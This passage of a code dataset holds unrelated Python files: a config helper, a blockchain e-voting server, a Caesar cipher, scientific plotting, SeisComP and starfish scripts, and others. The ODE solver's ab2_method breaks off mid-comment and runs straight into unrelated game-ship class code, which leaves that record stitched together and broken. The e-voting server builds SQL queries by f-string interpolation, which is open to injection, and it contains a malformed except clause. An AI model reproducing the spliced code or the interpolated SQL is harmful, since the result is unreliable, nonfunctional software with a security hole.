main()\n","repo_name":"rahularepaka/ObjectDetectionYolov4Web","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6997,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"25188179032","text":"import json\n\n\ndef get_config(config_key: str):\n try:\n with open(\"config.json\", mode=\"r\", encoding=\"utf-8\") as f:\n config = json.loads(f.read())\n if str(config_key) in config.keys():\n return config[config_key]\n else:\n return None\n except Exception as e:\n print(e)\n return None\n\n\ndef set_config(config_key: str, value):\n try:\n with open(\"config.json\", mode=\"r\", encoding=\"utf-8\") as f:\n config = json.loads(f.read())\n except Exception as e:\n print(e)\n config = {}\n\n config[config_key] = value\n tmp = json.dumps(config)\n with open(\"config.json\", mode=\"w\", encoding=\"utf-8\") as f:\n f.write(tmp)\n","repo_name":"runo0044/OpenAI-API-DiscordBot","sub_path":"configIo.py","file_name":"configIo.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72093828268","text":"from http.server import HTTPServer\nfrom threading import Thread\nimport requests\nimport base64\nimport json\nimport time\nimport re\n\nfrom blockchain import Blockchain\nfrom handler import Handler\nfrom db import Database\n\n'''\nThe structure would be\n\n\tBlockchains : The elections\n\tBlocks in each blockchain : Votes in each election\n\n'''\n\nblockchains = {}\n\ndef enqueue_voting(server):\n\t# Connect to database from \"config.json\"\n\ttry:\n\t\twith open('config.json', 'r', encoding='utf-8') as f:\n\t\t\tconfig = json.load(f)\n\t\tdb = Database(*[config[k] for k in ['host', 'username', 'password', 'database']])\n\texcept e as Exception:\n\t\tprint(f'Failed to connect to database!\\n\\t{e.message}')\n\n\t# populating the blockchains cache\n\tcursor = db.execute(\n\t\t\tf\"SELECT id, difficulty, block_id FROM blockchains\"\n\t)\n\tif cursor and cursor.rowcount > 0:\n\t\t# Go through all chains\n\t\tfor blockchain in cursor:\n\t\t\tchain_id, difficulty, block_id = blockchain\n\t\t\tchain = Blockchain(difficulty=difficulty)\n\t\t\t\n\t\t\t# Getting the head block\n\t\t\tcursor = db.execute(\n\t\t\t\tf\"SELECT data, hash FROM blocks WHERE id={block_id}\"\n\t\t\t)\n\t\t\tif not cursor or cursor.rowcount != 1:\n\t\t\t\tprint('Warning, empty blockchain with no head block detected!')\n\t\t\t\tcontinue\n\t\t\tblock_data, block_hash = cursor.next()\n\t\t\tchain.add(block_data)\n\t\t\tassert chain.blocks[-1].hash == block_hash, 'Unmatched hash!'\n\n\t\t\t# Go through all blocks in each chain (excluding the head)\n\t\t\twhile True:\n\t\t\t\tcursor = db.execute(\n\t\t\t\t\tf\"SELECT data, hash FROM blocks WHERE prev_hash='{block_hash}'\"\n\t\t\t\t)\n\t\t\t\tif not cursor or cursor.rowcount != 1:\n\t\t\t\t\tprint(f'Found {len(chain.blocks)} blocks for chain {chain_id}!')\n\t\t\t\t\tblockchains[chain_id] = chain\n\t\t\t\t\tbreak\n\t\t\t\tblock_data, block_hash = cursor.next()\n\t\t\t\tchain.add(block_data)\n\t\t\t\tassert chain.blocks[-1].hash == block_hash, 'Unmatched hash!'\n\n\tprint(f'Total blockchains: {len(blockchains)}')\n\n\twhile True:\n\t\ttime.sleep(1)\n\t\tif len(server.queue) > 0:\n\t\t\tprint('Found a vote!')\n\t\t\tvote = server.queue.pop()\n\t\t\tvote_id = vote['vote']\n\t\t\telection_id = vote['election']\n\t\t\tpublic_key = vote['public_key']\n\n\t\t\t# Sign the vote and get the signature\n\t\t\tresult = json.loads(requests.post(\n\t\t\t\t'http://localhost/blockchain/ajax.php?action=sign',\n\t\t\t\theaders={\n\t\t\t\t\t'Authorization': public_key\n\t\t\t\t},\n\t\t\t\tdata={'vote_id': vote_id}\n\t\t\t).text)\n\t\t\tif not result['success']:\n\t\t\t\tprint(f'Warning: Failed to sign vote with id {vote_id}')\n\t\t\t\tprint('Voting result', result)\n\n\t\t\t# Check for existing block chain\n\t\t\tcursor = db.execute(\n\t\t\t\tf\"SELECT id FROM blockchains WHERE election_id={election_id}\"\n\t\t\t)\n\t\t\tif cursor:\n\t\t\t\tif cursor.rowcount == 0:\n\t\t\t\t\t# Using a default difficulty\n\t\t\t\t\tdifficulty = 4\n\n\t\t\t\t\t# Create a new block chain\n\t\t\t\t\tchain = Blockchain(difficulty=difficulty)\n\n\t\t\t\t\t# Encrypt the block data\n\t\t\t\t\tblock_data = json.loads(requests.post(\n\t\t\t\t\t\t'http://localhost/blockchain/ajax.php?action=encrypt',\n\t\t\t\t\t\theaders={\n\t\t\t\t\t\t\t'Authorization': public_key\n\t\t\t\t\t\t},\n\t\t\t\t\t\tdata={'data': json.dumps({'vote_id': vote_id})}\n\t\t\t\t\t).text)['data']\n\n\t\t\t\t\t# Adding new head block to it\n\t\t\t\t\tchain.add(block_data)\n\n\t\t\t\t\t# Insert the head block into the blocks table\n\t\t\t\t\tblock = chain.blocks[-1]\n\t\t\t\t\tcursor = db.execute(\n\t\t\t\t\t\t'INSERT INTO blocks ' +\n\t\t\t\t\t\t'(data, nonce, prev_hash, hash) ' + \n\t\t\t\t\t\t'VALUE (%s, %s, %s, %s)', \n\t\t\t\t\t\t(block.data, block.nonce, block.prev, block.hash)\n\t\t\t\t\t)\n\t\t\t\t\tdb.commit()\n\t\t\t\t\tprint('Info: Block successfully inserted into db')\n\t\t\t\t\t\n\t\t\t\t\t# Get the block id from the hash\n\t\t\t\t\tcursor = db.execute(\n\t\t\t\t\t\t\tf\"SELECT id FROM blocks WHERE hash='{block.hash}'\"\n\t\t\t\t\t)\n\t\t\t\t\tblock_id = cursor.next()[0]\n\n\t\t\t\t\t# Insert the chain into blockchains table\n\t\t\t\t\tcursor = db.execute('''\n\t\t\t\t\t\tINSERT INTO blockchains (block_id, election_id, difficulty)\n\t\t\t\t\t\t VALUE (%s, %s, %s)\n\t\t\t\t\t''', (block_id, election_id, difficulty))\n\t\t\t\t\tdb.commit()\n\t\t\t\t\tprint('Info: Blockchain successfully inserted into db')\n\n\t\t\t\t\t# Get the inserted blockchain id and insert into cache\n\t\t\t\t\tcursor = db.execute(\n\t\t\t\t\t\tf\"SELECT id FROM blockchains WHERE election_id={election_id}\"\n\t\t\t\t\t)\n\t\t\t\t\tblockchains[int(cursor.next()[0])] = chain\n\t\t\t\telif cursor.rowcount == 1:\n\t\t\t\t\t# Use that existing block chain\n\t\t\t\t\tchain = blockchains[int(cursor.next()[0])]\n\n\t\t\t\t\t# Encrypt the block data\n\t\t\t\t\tblock_data = json.loads(requests.post(\n\t\t\t\t\t\t'http://localhost/blockchain/ajax.php?action=encrypt',\n\t\t\t\t\t\theaders={\n\t\t\t\t\t\t\t'Authorization': public_key.encode('utf-8')\n\t\t\t\t\t\t},\n\t\t\t\t\t\tdata={'data': json.dumps({'vote_id': vote_id})}\n\t\t\t\t\t).text)['data']\n\n\t\t\t\t\t# Adding new head block to it\n\t\t\t\t\tchain.add(block_data)\n\n\t\t\t\t\t# Insert the head block into the blocks table\n\t\t\t\t\tblock = chain.blocks[-1]\n\t\t\t\t\tcursor = db.execute(\n\t\t\t\t\t\t'INSERT INTO blocks ' +\n\t\t\t\t\t\t'(data, nonce, prev_hash, hash) ' + \n\t\t\t\t\t\t'VALUE (%s, %s, %s, %s)', \n\t\t\t\t\t\t(block.data, block.nonce, block.prev, block.hash)\n\t\t\t\t\t)\n\t\t\t\t\tdb.commit()\n\t\t\t\t\tprint('Info: Block successfully inserted into db.')\n\nif __name__ == '__main__':\n\tserver = HTTPServer(('0.0.0.0', 8000), Handler)\n\tserver.queue = [] # The queue for the incoming votes\n\t\n\tThread(target=enqueue_voting, daemon=True, args=(server, )).start()\n\tserver.serve_forever()\n","repo_name":"xxMrPHDxx/blockchain-evoting-backend","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2959859092","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 23 14:10:14 2013\nscipy.signalを利用したボード線図の描画\nここで使用する関数はscipyのversion 0.11.0以降で利用可能\n@author: ***\n\"\"\"\n\nfrom scipy import signal#scipy.signalのインポート\nimport matplotlib.pyplot as plt#pyplotのインポート\nimport matplotlib as mpl\n\nmpl.rcParams['axes.grid']=True\n\n#伝達関数の設定にはsignal.ltiを利用する\n#1つ目の要素が伝達関数の分子,2つ目が分母になる.\n#分母分子に複数の要素があると先頭が最大次数になる.\ns1 = signal.lti([100], [1,100])\n#伝達関数を元に周波数とマグニチュード(dB)と角度(deg)を返す\nw, mag, phase = s1.bode()\n\n#グラフ描画\nplt.figure()\nplt.subplot(211)\nplt.semilogx(w, mag)\nplt.subplot(212)\nplt.semilogx(w, phase)\n","repo_name":"rutaro/study_meeting","sub_path":"scipytest_bode.py","file_name":"scipytest_bode.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42140091067","text":"def calc_gep(a, b):\n return abs(int(a) - int(b))\n\ntarget_channel = input()\nbroken_count = int(input())\n\nif broken_count != 0:\n broken_number = list(map(int, input().split()))\n available_number = []\n\n for number in range(10):\n if number not in broken_number:\n available_number.append(number)\n\nelse:\n available_number = [number for number in range(0, 10)]\n\nif abs(int(target_channel) - 100) <= len(target_channel) or len(available_number) == 0:\n print(abs(int(target_channel) - 100)) \n\nelse:\n all_channel = [str(number) for number in available_number]\n before_boundary = 0\n count = 1\n close_channel = all_channel[0]\n push_count = 0\n max_gap = 10000000001\n\n while count < len(target_channel) + 1:\n next_node = []\n \n for current_element in all_channel[before_boundary:]:\n for number in available_number:\n gen_number = current_element + str(number)\n if calc_gep(gen_number, target_channel) < max_gap:\n max_gap = calc_gep(gen_number, target_channel)\n next_node.append(current_element + str(number))\n\n before_boundary = len(all_channel)\n\n for channel in next_node:\n if channel[0] != \"0\":\n all_channel.append(channel)\n\n count += 1\n\n for number in all_channel:\n if calc_gep(number, target_channel) < calc_gep(close_channel, target_channel):\n close_channel = number\n\n push_count = len(str(int(close_channel)))\n\n if calc_gep(close_channel, target_channel) + push_count > calc_gep(target_channel, 100):\n print(calc_gep(target_channel, 100))\n\n else:\n print(push_count + calc_gep(close_channel, target_channel))\n","repo_name":"W1nU/algorithm","sub_path":"first/1107.py","file_name":"1107.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40643178600","text":"import sys\n\n\ndef encode(string, shift):\n try:\n string.encode('ascii')\n except UnicodeEncodeError:\n raise Exception(\"The script does not support your language yet.\")\n\n lower = [chr(i) for i in range(ord('a'), ord('z') + 1)]\n upper = [chr(i) for i in range(ord('A'), ord('Z') + 1)]\n result = \"\"\n for i in string:\n if i in lower:\n result += lower[(lower.index(i) + shift) % 26]\n elif i in upper:\n result += upper[(upper.index(i) + shift) % 26]\n else:\n result += i\n return result\n\n\nif __name__ == '__main__':\n if len(sys.argv) == 4:\n if sys.argv[1] == 'encode':\n print(encode(sys.argv[2], int(sys.argv[3])))\n elif sys.argv[1] == 'decode':\n print(encode(sys.argv[2], -int(sys.argv[3])))\n else:\n print('incorrect operation or option')\n else:\n print('invalid number of arguments')\n","repo_name":"djoye21school/Piscine_DS","sub_path":"day01/ex09/caesar.py","file_name":"caesar.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1379096570","text":"#!/usr/bin/env python3\n\n# ~~=) All Rights Reversed (=~~\n\nimport sys\n\n# Get input from stdin or argv[1]\nif len(sys.argv) == 1:\n\tf = sys.stdin\nelse:\n\tf = open(sys.argv[1])\n\n# Read the whole file into binstr\nbinstr = f.read()\n# Done with f, close it\nf.close()\n# Add 0b at beginning and remove all whitespace\nbinstr = '0b' + binstr.replace(' ', '').replace('\\t', '').replace('\\n', '')\n# Convert to ascii\nn = int(binstr, 2)\ns = n.to_bytes((n.bit_length() + 7) // 8, 'big').decode()\nprint(s)\n","repo_name":"AlbertVeli/misc-tools","sub_path":"binstringtoascii.py","file_name":"binstringtoascii.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30267711419","text":"import sys\nimport seiscomp.client\nimport seiscomp.core\nfrom scstuff.inventory import InventoryIterator\n\nclass InvApp(seiscomp.client.Application):\n def __init__(self, argc, argv):\n seiscomp.client.Application.__init__(self, argc, argv)\n self.setMessagingEnabled(False)\n self.setDatabaseEnabled(True, True)\n self.setLoggingToStdErr(True)\n self.setLoadInventoryEnabled(True)\n\n def run(self):\n now = seiscomp.core.Time.GMT()\n lines = []\n coord = {}\n inv = seiscomp.client.Inventory.Instance().inventory()\n\n for (network, station, location, stream) in InventoryIterator(inv, now):\n n,s,l,c = network.code(), station.code(), location.code(), stream.code()\n if (n,s) in coord:\n continue\n\n coord[n,s] = (station.latitude(), station.longitude(), station.elevation())\n\n for (n,s) in coord:\n lat,lon,elev = coord[n,s]\n lines.append(\"%-2s %-5s %8.4f %9.4f %4.0f\" % (n,s,lat,lon,elev))\n\n lines.sort()\n for line in lines:\n print(line)\n return True\n\n\ndef main(argc, argv):\n app = InvApp(argc, argv)\n app()\n\n\nif __name__ == \"__main__\":\n argc = len(sys.argv)\n argv = sys.argv\n main(argc, argv)\n","repo_name":"jsaul/scstuff","sub_path":"apps/dump-station-coordinates/dump-station-coordinates.py","file_name":"dump-station-coordinates.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"42810186112","text":"from rest_framework import serializers\n\nfrom sponsor.models import Sponsor\n\nclass SponsorSerializer(serializers.ModelSerializer):\n\n class Meta:\n\n model = Sponsor\n fields = (\n 'id',\n 'division',\n 'grade',\n 'support_date',\n 'support_amount',\n 'title',\n 'sub_title',\n 'department',\n 'establish_date',\n 'logo_url',\n 'slogan',\n 'location',\n 'description',\n 'keyword',\n 'email',\n 'homepage',\n\n 'created',\n )","repo_name":"HodongMan/unit-server-1.0","sub_path":"sponsor/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18040095764","text":"\"\"\"\n.. _howto_tracebuildingstrategies:\n\nWhen to Use Each ``TraceBuildingStrategies``\n============================================\n\nIn order to multiplex image-based transcriptomics assays beyond the number of spectrally distinct\nfluorophores, assays use multiple rounds of imaging. Before every round, RNA transcripts or\namplicons are relabeled so that if you trace a spot across rounds, the spot will have a\npattern of signals. This pattern should match a :term:`codeword` in the\n:term:`codebook`.\n\nThere are three different ``TraceBuilders`` that can be used to trace spots in\n:py:class:`.SpotFindingResults` into an :py:class:`.IntensityTable` or\n:py:class:`.DecodedIntensityTable`. It is important to choose the correct ``TraceBuilder`` that\nmatches the codebook design and data.\n\n.. image:: /_static/design/tracebuilder_decisiontree.png\n :scale: 50 %\n :alt: Which TraceBuilder To Use\n :align: center\n\nThe chosen ``TraceBuilder`` must also be compatible with how the :py:class:`.SpotFindingResults`\nwas generated. :py:class:`.FindSpotsAlgorithm`\\s can be run with or without a ``reference_image``.\nIf run with a ``reference_image`` then every :py:class:`.PerImageSliceSpotResults` in\n:py:class:`.SpotFindingResults` will have the same spots for every (round, channel) image volume.\nThis is necessary for :py:func:`.build_spot_traces_exact_match` but not recommended for\n:py:func:`.build_traces_sequential` and :py:func:`.build_traces_nearest_neighbors`.\n\n.. list-table:: ``TraceBuildingStrategy``\n :widths: auto\n :header-rows: 1\n\n * - Method\n - Description\n - Reference Image\n * - ``SEQUENTIAL``\n - Build traces for every detected spot by setting intensity values to zero for all rounds\n and channels the spot was not found in (i.e. every trace will have only 1 non-zero value)\n - Incompatible\n * - ``EXACT_MATCH``\n - Build traces by combining intensity values of spots from every rounds and channel in the\n exact same location as spots in ``reference_image``\n - Required\n * - ``NEAREST_NEIGHBOR``\n - Build traces by combining intensity values of spots from rounds and channels nearest to the\n spots in the ``anchor_round``\n - Not recommended; will have same result as EXACT_MATCH\n\n\"\"\"\n\n# Load and process ISS images to find spots with and without reference image\nfrom starfish.image import ApplyTransform, LearnTransform, Filter\nfrom starfish.types import Axes\nfrom starfish import data, display, FieldOfView\nfrom starfish.spots import FindSpots\n\nexperiment = data.ISS()\nfov = experiment.fov()\nimgs = fov.get_image(FieldOfView.PRIMARY_IMAGES) # primary images\ndots = fov.get_image(\"dots\") # reference round for image registration\n\n# filter raw data\nmasking_radius = 15\nfilt = Filter.WhiteTophat(masking_radius, is_volume=False)\nfilt.run(imgs, in_place=True)\nfilt.run(dots, in_place=True)\n\n# register primary images to reference round\nlearn_translation = LearnTransform.Translation(reference_stack=dots, axes=Axes.ROUND, upsampling=1000)\ntransforms_list = learn_translation.run(imgs.reduce({Axes.CH, Axes.ZPLANE}, func=\"max\"))\nwarp = ApplyTransform.Warp()\nwarp.run(imgs, transforms_list=transforms_list, in_place=True)\n\n# run blob detector on dots and on image stack\nbd = FindSpots.BlobDetector(\n min_sigma=1,\n max_sigma=10,\n num_sigma=30,\n threshold=0.01,\n measurement_type='mean',\n)\ndots_max = dots.reduce((Axes.ROUND, Axes.ZPLANE), func=\"max\")\nspots_from_ref = bd.run(image_stack=imgs, reference_image=dots_max)\nspots_from_stack = bd.run(image_stack=imgs)\n\n\n####################################################################################################\n# Typical pipelines will set the ``trace_building_strategy`` as an argument in the\n# :py:class:`.DecodeSpotsAlgorithm` but here the underlying code is exposed to reveal what the\n# different :py:class:`.IntensityTable`\\s look like depending on which ``TraceBuilder`` is used.\n\nfrom starfish.core.spots.DecodeSpots.trace_builders import build_spot_traces_exact_match, \\\n build_traces_sequential, build_traces_nearest_neighbors\n\nprint('Build trace with EXACT_MATCH')\nprint(build_spot_traces_exact_match(spots_from_ref))\n\n####################################################################################################\n# When building spot traces with EXACT_MATCH, every feature has a value in each round and channel\n# because a ``reference_image`` was used in spot finding.\n\nprint('\\nBuild trace with SEQUENTIAL')\nprint(build_traces_sequential(spots_from_stack))\n\n####################################################################################################\n# When building spot traces with SEQUENTIAL, every feature has only one non-zero round and channel\n# because :py:func:`.build_traces_sequential` automatically assigns a zero value to all other\n# rounds and channels.\n\nprint('\\nBuild trace with NEAREST_NEIGHBORS')\nprint(build_traces_nearest_neighbors(spots_from_stack, search_radius=5))\n\n####################################################################################################\n# When building spot traces with NEAREST_NEIGHBORS on spots found in :py:class:`.ImageStack`\n# without a ``reference image``, the ``nan`` values are due to no spot being found within the\n# ``search_radius`` of the ``anchor_round``.\n\nprint('\\nBuild trace with NEAREST_NEIGHBORS')\nprint(build_traces_nearest_neighbors(spots_from_ref, search_radius=5))\n\n####################################################################################################\n# The same :py:func:`.build_traces_nearest_neighbors` applied to spots found in\n# :py:class:`.ImageStack` *with* a ``reference image`` guarantees a spot to be found in every\n# round of :py:class:`.SpotFindingResults`.","repo_name":"spacetx/starfish","sub_path":"examples/how_to/tracebuildingstrategies.py","file_name":"tracebuildingstrategies.py","file_ext":"py","file_size_in_byte":5745,"program_lang":"python","lang":"en","doc_type":"code","stars":220,"dataset":"github-code","pt":"37"} +{"seq_id":"21292416125","text":"from node import Node\nfrom edge import Edge\nfrom community import Community\n\nclass Graph:\n \"\"\"\n A collection of nodes and arcs between nodes that represent a graph\n \"\"\"\n\n def __init__(self, name, nodes=None, edges=None, communities=None):\n \"\"\"\n Constructs a graph, can be an empty graph\n :param name: Name of the graph\n :param nodes: List of nodes that make up a graph\n :param edges: List of edges that connect nodes\n :param communities: List of communities that are part of the graph\n \"\"\"\n self.name = name\n if nodes is None:\n self.nodes = []\n if edges is None:\n self.edges = []\n if communities is None:\n self.communities = []\n\n def getName(self):\n return self.name\n\n def getNodes(self):\n return self.nodes\n\n def addNode(self, newNode):\n self.nodes.append(newNode)\n\n def getEdges(self):\n return self.edges\n\n def getTotalEdgeWeight(self):\n \"\"\"\n Sums the weights of all edges in the graph\n :return: m: the total edge weight\n \"\"\"\n m = 0\n for edge in self.getEdges():\n m += edge.getWeight()\n return m\n\n def addEdge(self, newEdge):\n self.edges.append(newEdge)\n\n def getCommunities(self):\n return self.communities\n\n def addCommunity(self, newCommunity):\n self.communities.append(newCommunity)\n\n def getSize(self):\n return\n\n\ndef makeGraphFromDict(name, dict):\n \"\"\"\n Updates this graph to be equal to a dictionary representation of a graph.\n Essentially a secondary constructor using a dict\n :param dict: Dictionary representation of a graph\n :return: Graph object that is equivalent to dict\n \"\"\"\n\n graph = Graph(name)\n communities = []\n nodes = []\n\n for nodeID, nodeValues in dict.items():\n c = Community(nodeValues[1])\n n = Node(nodeID)\n if n not in nodes:\n nodes.append(n)\n for node in nodes:\n if node == n:\n n = node\n for neighborID, arcWeight in nodeValues[0].items():\n n2 = Node(neighborID)\n if n2 not in nodes:\n nodes.append(n2)\n for node in nodes:\n if node == n2:\n n2 = node\n e = Edge(n, n2, arcWeight)\n if e not in graph.getEdges():\n graph.addEdge(e)\n n.addConnection(e)\n n2.addConnection(e)\n if c not in communities:\n communities.append(c)\n for comm in communities:\n if c == comm:\n c = comm\n c.addMemberNode(n)\n\n for node in nodes:\n graph.addNode(node)\n for c in communities:\n graph.addCommunity(c)\n\n return graph\n","repo_name":"Spatika-Ganesh/datawhisperers","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24936171698","text":"from collections import namedtuple\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nResult = namedtuple(\"Result\", [\"S\", \"E\", \"ES\", \"P\", \"kf\", \"kr\", \"kc\", \"h\", \"T\"])\n\ndef forward_euler(S0, E0, ES0, P0, kf, kr, kc, h, T):\n total_steps = int(T/h + 1)\n S = np.zeros(total_steps)\n E = np.zeros(total_steps)\n ES= np.zeros(total_steps)\n P = np.zeros(total_steps)\n S[0] = S0\n E[0] = E0\n ES[0]= ES0\n P[0] = P0\n\n t = 0\n i = 0\n\n dS = lambda i : -kf*E[i]*S[i] + kr*ES[i]\n dE = lambda i : -kf*E[i]*S[i] + kr*ES[i] + kc*ES[i]\n dES= lambda i : kf*E[i]*S[i] - kr*ES[i] - kc*ES[i]\n dP = lambda i : kc*ES[i]\n\n while i+1 < total_steps:\n S[i+1] = S[i] + h*dS(i)\n E[i+1] = E[i] + h*dE(i)\n ES[i+1]= ES[i]+ h*dES(i)\n P[i+1] = P[i] + h*dP(i)\n t += h\n i += 1\n\n return Result(S, E, ES, P, kf, kr, kc, h, T)\n\ndef ab2_method(S0, E0, ES0, P0, kf, kr, kc, h, T):\n total_steps = int(T/h + 1)\n S = np.zeros(total_steps)\n E = np.zeros(total_steps)\n ES= np.zeros(total_steps)\n P = np.zeros(total_steps)\n S[0] = S0\n E[0] = E0\n ES[0]= ES0\n P[0] = P0\n\n dS = lambda i : -kf*E[i]*S[i] + kr*ES[i]\n dE = lambda i : -kf*E[i]*S[i] + kr*ES[i] + kc*ES[i]\n dES= lambda i : kf*E[i]*S[i] - kr*ES[i] - kc*ES[i]\n dP = lambda i : kc*ES[i]\n\n\n # First we need to find the first value for the concentrations\n # by doing forward euler at a step size of 0:\n self.centerx -= self.ai_settings.ship_speed_factor\n\n #Update rect object from self.center\n self.rect.centerx = self.centerx\n\n def blitme(self):\n \"\"\"Draw the sip at its current location\"\"\"\n self.screen.blit(self.image, self.rect)\n\n def center_ship(self):\n \"\"\"Center the ship on the screen\"\"\"\n self.center = self.screen_rect.centerx","repo_name":"Securityinspired0/alieninvasion-repo1","sub_path":"ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71299386668","text":"'''\nInformation:\n Use this function to add number no matter how many.\n\nSyntax:\n add([...])\n\nExample:\n add([1, 2, 3, 4, 5])\n add([142, 32532, 523, 25325])\n\nNote:\n - You need to add this inside the print statement so as to get the result printed in the terminal.\n'''\n\ndef add(numberlist):\n result = 0\n for number in numberlist:\n result += number\n return result\n\n\"\"\"\nMade by:\n Bhavyadeep31\n\"\"\"","repo_name":"Bhavyadeep31/jervismath","sub_path":"jmath/Arithmetic/addition.py","file_name":"addition.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38985041021","text":"def found(text, keys, mode='all', substring=False):\n \"\"\"\n Searches key elements in given text string(s) with three different modes: all, any, none\n\n Args:\n text: (list or str)\n keys: (list) keys to search in texts\n mode: (str) ['all', 'any', 'none']\n substring: (bool) search in substrings in given text string(s) or fully match\n\n Returns:\n result: (bool)\n\n \"\"\"\n assert mode in ['all', 'any', 'none']\n if isinstance(text, str):\n text = [text]\n\n count = 0\n for key in keys:\n for item in text:\n if not substring and key.lower() == item.lower() or substring and key.lower() in item.lower():\n count += 1\n break\n\n if mode == 'all':\n return len(keys) == count\n elif mode == 'any':\n return count > 0\n else:\n return count == 0\n","repo_name":"MaxinAI/bank_of_england_news_analysis","sub_path":"model/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34296761072","text":"from django.urls import path\nfrom .views import *\n\n\nurlpatterns = [\n path(\"clients\", Clients.as_view(), name=\"clients\"),\n path(\"clients/\", ClientInformation.as_view(), name=\"client_information\"),\n path(\"products\", Products.as_view(), name=\"products\"),\n path(\"products/\", ProductInformation.as_view(), name=\"product_information\"),\n path(\"migration\", MigrationAssistant.as_view(), name=\"migration\"),\n]","repo_name":"alejofl/tpo-bd2","sub_path":"turtle_inc/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36763579902","text":"# -----------------------------------------------------------\r\n# Consider a sequence u where u is defined as follows:\r\n# \r\n# The number u(0) = 1 is the first one in u.\r\n# For each x in u, then y = 2 * x + 1 and z = 3 * x + 1 must be in u too.\r\n# There are no other numbers in u.\r\n# Ex: u = [1, 3, 4, 7, 9, 10, 13, 15, 19, 21, 22, 27, ...]\r\n# \r\n# 1 gives 3 and 4, then 3 gives 7 and 10, 4 gives 9 and 13, then 7 gives 15 and 22 and so on...\r\n# \r\n# Task:\r\n# Given parameter n the function dbl_linear (or dblLinear...) returns the element u(n) of the ordered (with <) sequence u (so, there are no \r\n# duplicates).\r\n# \r\n# Example:\r\n# dbl_linear(10) should return 22\r\n# \r\n# Note:\r\n# Focus attention on efficiency\r\n# -----------------------------------------------------------\r\n\r\ndef dbl_linear(n):\r\n arr = [1] \r\n y, z = 0, 0\r\n while len(arr) <= n: \r\n i = 2*arr[y] + 1 \r\n j = 3*arr[z] + 1 \r\n if i > j: \r\n arr.append(j)\r\n z += 1 \r\n elif i < j: \r\n arr.append(i)\r\n y += 1 \r\n else: \r\n arr.append(i)\r\n y += 1 \r\n z += 1\r\n return arr[n]\r\n\r\n# -----------------------------------------------------------\r\n# License\r\n# Tasks are the property of Codewars (https://www.codewars.com/) \r\n# and users of this resource.\r\n# \r\n# All solution code in this repository \r\n# is the personal property of Vladimir Rukavishnikov\r\n# (vladimirrukavishnikovmail@gmail.com).\r\n# \r\n# Copyright (C) 2022 Vladimir Rukavishnikov\r\n# \r\n# This file is part of the HungryVovka/Codewars-Python\r\n# (https://github.com/HungryVovka/Codewars-Python)\r\n# \r\n# License is GNU General Public License v3.0\r\n# (https://github.com/HungryVovka/Codewars-Python/blob/main/LICENSE.md)\r\n# \r\n# You should have received a copy of the GNU General Public License v3.0\r\n# along with this code. If not, see http://www.gnu.org/licenses/\r\n# -----------------------------------------------------------","repo_name":"HungryVovka/Codewars-Python","sub_path":"4 kyu/Twice linear.py","file_name":"Twice linear.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31336989034","text":"import os\nx = 10\nprint('blz?')\nretorno = os.fork()\n\nif retorno == 0:\n print('Sou o filho com pid', os.getpid(), x)\nelse:\n os.wait()\n print('Sou o pai', os.getpid(), 'Criei o filho', retorno)\n\n","repo_name":"gabrielmacaubas/IFPB","sub_path":"SO/semana-04/pai-filho.py","file_name":"pai-filho.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36114361945","text":"from flask import render_template, redirect, url_for, request, flash, Markup, session\nfrom wtforms.validators import ValidationError\nfrom cardiology.models import Doctors, Patients, Appointments, Medical_records, p_Messages, Scans, Prescription, \\\n examin\nfrom cardiology.forms import editPatientForm\nfrom cardiology import app, db\nfrom datetime import datetime, timedelta\nfrom cardiology.my_functions import any_name, parse_time, generate_gcalendar_link, availabe_appointments, save_picture, \\\n sorting_appointments, parse_time2\nfrom flask_login import current_user, login_required\n\n# ---------------------------------\np_user = current_user\ndoctors = Doctors.query.all()\n\n\n# ---------------------------------\n\n\n@app.route('/PatientProfile', methods=['GET', 'POST'])\n@login_required\ndef p_profile():\n # For the dynamic navbar\n if session[\"role\"] == \"Patient\":\n # For the dynamic navbar\n sidebar_active = 'p_profile'\n MR = Medical_records.query.filter_by(p_id=current_user.p_id).first()\n PRs = Prescription.query.filter_by(p_id=current_user.p_id).all()\n appoints = 